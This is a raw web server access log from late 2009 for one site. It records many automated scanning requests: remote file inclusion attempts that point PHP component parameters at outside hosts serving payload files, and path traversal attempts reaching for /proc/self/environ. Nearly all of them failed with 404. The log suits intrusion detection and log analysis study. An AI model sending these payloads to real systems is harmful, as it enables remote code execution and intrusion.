69.175.26.26 - - [29/Nov/2009:22:06:21 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.107.65.18 - - [29/Nov/2009:22:06:52 -0800] "GET /logs/access_090720.log/phpwcms/include/inc_ext?spaw/dialogs/table.php?spaw_root=http://kopeysk.nichost.ru/njajalweb/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:12 -0800] "GET /logs/access_090720.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:12 -0800] "GET /logs/access_090810.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:13 -0800] "GET /logs/access_090427.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:25 -0800] "GET /logs/access_090622.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:25 -0800] "GET /logs/access_090817.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:25 -0800] "GET /logs/access_090713.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:25 -0800] "GET /logs/access.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:26 -0800] "GET /logs/access_090921.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:26 -0800] "GET /logs/access_090608.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:30 -0800] "GET /logs/access_090803.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:30 -0800] "GET /logs/access_090907.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:08:30 -0800] "GET /logs/access_090511.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [29/Nov/2009:22:08:47 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:10:02 -0800] "GET /logs/access_090810.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:10:02 -0800] "GET /logs/access_090720.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [29/Nov/2009:22:10:11 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [29/Nov/2009:22:10:12 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [29/Nov/2009:22:10:12 -0800] "GET /logs/access_090525.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [29/Nov/2009:22:10:37 -0800] "GET /logs/access_090511.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.moodleuwcad.com/xoops/kernel/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:10:56 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:11:14 -0800] "GET /logs/access_090427.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:11:16 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:11:52 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:11:52 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.22.133.229 - - [29/Nov/2009:22:12:04 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.22.133.229 - - [29/Nov/2009:22:12:05 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:06 -0800] "GET /logs/access_090525.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:06 -0800] "GET /logs/access_090504.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.22.133.229 - - [29/Nov/2009:22:12:08 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [29/Nov/2009:22:12:15 -0800] "GET /logs/access.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:12:15 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:12:15 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:32 -0800] "GET /logs/access_090622.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:32 -0800] "GET /logs/access_090817.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:32 -0800] "GET /logs/access.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:32 -0800] "GET /logs/access_090713.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:22:12:33 -0800] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:22:12:33 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:22:12:33 -0800] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:22:12:33 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:12:38 -0800] "GET /logs/access_090622.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090608.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090921.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090907.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090831.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090615.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090824.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090629.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090803.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:12:39 -0800] "GET /logs/access_090511.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:13:42 -0800] "GET /logs/access_090810.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:13:42 -0800] "GET /logs/access_090720.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:13:42 -0800] "GET /logs/access_090427.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:13:47 -0800] "GET /logs/access_090504.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:13:47 -0800] "GET /logs/access_090525.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:13:56 -0800] "GET /logs/access_090720.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:13:56 -0800] "GET /logs/access_090810.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:13:56 -0800] "GET /logs/access_090427.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.136 - - [29/Nov/2009:22:14:00 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:01 -0800] "GET /logs/access_090525.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:01 -0800] "GET /logs/access_090504.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:11 -0800] "GET /logs/access_090622.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:14 -0800] "GET /logs/access_090817.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:16 -0800] "GET /logs/access.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:36 -0800] "GET /logs/access_090622.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:37 -0800] "GET /logs/access_090817.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:37 -0800] "GET /logs/access.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:37 -0800] "GET /logs/access_090713.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:14:45 -0800] "GET /logs/access_090615.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:14:48 -0800] "GET /logs/access_090713.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [29/Nov/2009:22:14:59 -0800] "GET /logs/access_090928.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [29/Nov/2009:22:15:03 -0800] "GET /logs/access_090928.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [29/Nov/2009:22:15:03 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [29/Nov/2009:22:15:03 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://vega.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.249.65.175 - - [29/Nov/2009:22:15:49 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:15:54 -0800] "GET /logs/access_090803.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:15:56 -0800] "GET /logs/access_090608.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:15:56 -0800] "GET /logs/access_090831.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:15:56 -0800] "GET /logs/access_090921.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:15:56 -0800] "GET /logs/access_090907.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:15:56 -0800] "GET /logs/access_090803.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:15:56 -0800] "GET /logs/access_090824.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:14 -0800] "GET /logs/access_090608.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:24 -0800] "GET /logs/access_090824.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:25 -0800] "GET /logs/access_090831.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:25 -0800] "GET /logs/access_090615.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:25 -0800] "GET /logs/access_090629.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:25 -0800] "GET /logs/access_090511.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:30 -0800] "GET /logs/access_090921.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:31 -0800] "GET /logs/access_090907.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:22:16:34 -0800] "GET /logs/access_090928.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
200.234.200.133 - - [29/Nov/2009:22:16:35 -0800] "GET /logs/access_090928.log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:37 -0800] "GET /logs/access_090615.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:37 -0800] "GET /logs/access_090629.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.106.119 - - [29/Nov/2009:22:16:37 -0800] "GET /logs/access_090511.log/admin/editeur/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(pirates).txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.255.23.47 - - [29/Nov/2009:22:16:45 -0800] "GET /logs/access_090907.log//main.php?sayfa=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:18 -0800] "GET /logs/access_090810.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:18 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:18 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:21 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:21 -0800] "GET /logs/access_090810.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [29/Nov/2009:22:18:21 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
